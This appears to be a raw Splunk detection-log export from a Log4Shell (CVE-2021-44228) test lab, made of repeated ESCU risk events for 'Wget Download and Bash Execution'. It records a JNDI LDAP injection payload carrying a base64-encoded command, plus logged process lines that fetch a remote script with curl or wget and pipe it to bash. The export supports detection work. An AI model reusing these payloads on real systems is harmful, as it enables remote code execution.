`${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - 